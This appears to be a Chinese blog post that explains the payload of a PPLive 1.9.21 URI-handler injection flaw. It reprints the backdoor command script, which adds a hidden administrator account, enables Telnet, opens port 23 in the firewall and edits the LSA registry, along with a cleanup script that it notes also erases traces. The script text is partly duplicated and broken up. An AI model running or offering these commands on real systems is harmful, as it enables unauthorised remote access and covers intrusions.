今天看 PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection 这个漏洞,又学到一个命令:netsh firewall add portopening ...
以前就在想BC和eMule是怎么在Windows防火墙上打开监听端口的,今天算是如愿以偿的见到了。PPLive 1.9.21 这个漏洞注入的远程DLL,是一个简单的脚本,整理一下就是这样:
1
cmd
/
c
net
user abc abc123456
/
add
2 cmd / c net localgroup Administrators abc / add
3 cmd / c sc config TlntSvr start = auto
4 cmd / c net start TlntSvr
5 cmd / c netsh firewall add portopening tcp 23 sh
6 cmd / c echo REGEDIT4 > sh . reg
7 cmd / c echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa] >> sh . reg
8 cmd / c echo \ " forceguest\ " = dword: 00000000 >> sh . reg
9 cmd / c regedit / S sh . reg
10 cmd / c del sh . reg
2 cmd / c net localgroup Administrators abc / add
3 cmd / c sc config TlntSvr start = auto
4 cmd / c net start TlntSvr
5 cmd / c netsh firewall add portopening tcp 23 sh
6 cmd / c echo REGEDIT4 > sh . reg
7 cmd / c echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa] >> sh . reg
8 cmd / c echo \ " forceguest\ " = dword: 00000000 >> sh . reg
9 cmd / c regedit / S sh . reg
10 cmd / c del sh . reg
前两条给系统加个名为abc的管理员,
3-4行打开Telnet服务并设置其自动运行,
第5行就是要点了,将tcp的23(Telnet)端口的监听给放行,于是防火墙没问题了
6-10是输出一个reg文件,关闭简单文件共享(好像要不要无所谓了)
这样 telnet 127.0.0.1,输入abc 123456就可以顺利进入了,防火墙也没提示
(观众:废话这多还只开个Telnet,砸死他!...要是服务器,还真不如开3389)
恢复用脚本,当然也可以用于清理痕迹:
cmd
/
c
net
user abc
/
delete
cmd / c net stop TlntSvr
cmd / c sc config TlntSvr start = disabled
cmd / c sc config TlntSvr displayname = " Telnet " start = disabled
cmd / c netsh firewall delete portopening tcp 23
cmd / c net stop TlntSvr
cmd / c sc config TlntSvr start = disabled
cmd / c sc config TlntSvr displayname = " Telnet " start = disabled
cmd / c netsh firewall delete portopening tcp 23